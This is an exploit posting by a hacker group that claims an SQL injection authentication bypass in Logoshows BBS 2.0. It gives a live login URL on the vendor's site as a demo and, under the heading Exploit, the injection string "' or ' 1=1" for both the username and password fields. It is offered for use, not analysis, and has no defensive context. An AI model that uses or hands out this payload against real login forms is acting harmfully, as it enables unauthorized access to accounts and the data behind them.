Logoshows BBS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
0a1f6d3ed16deaa1dd577bdf068724edd315fc05ea058c95b3e4dafff93cde4c
#############################################################################
# #
# Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability #
# #
#############################################################################
#############################################################################
[~] -=[Dns-Team Marocain Hackers]=-
[~] Author: Dns-Team
[~] Contact: Q2[at]HoTmail[dot]Fr
[~] Site: www.Scam4u.com + www.Dns-Team.com
[~] Greetz: Sa4d + HSMX + Stack + PR0H4CK3RZ + N@bilX + Ga3 Réjàlà Xd :)
[~] Download : http://www.logoshows.com/download/bbs88.rar
#[---------------------------------I'm Kh0K0m MàN!x--------------------------------------]
[»] Demo :
#
# http://www.logoshows.com/bbs/globepersonnel_login.asp
#
[»] Exploit :
#
# username : ' or ' 1=1
# password : ' or ' 1=1
#
#[------------------------------------------------------------------------------------]
# - - +- Tnx Str0ke For UR Support -+ - -
#########################################################################################################